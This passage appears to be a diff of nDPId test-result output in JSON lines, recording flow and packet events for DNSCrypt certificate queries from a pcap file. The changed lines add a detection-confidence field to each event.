 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwiRAAL0R5K8KAAABuf2aQpc1EPcCCBcWY0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiUgAL0RAO8KAAABuf2aQq21EPcGBC1ZY0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwiZAAL0R5K0KAAABuf2aQrL3EPcCCBcWY0sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwiUAub0RJcIKAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwidAAL0R5KwKAAABuf2aQqoUEPcCCBcWY0kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiggAL0RAOwKAAABuf2aQrwfEPcGBB7tY0gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwigAub0RJb8KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwikgAL0RAOsKAAABuf2aQpZSEPcGBES4Y0oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA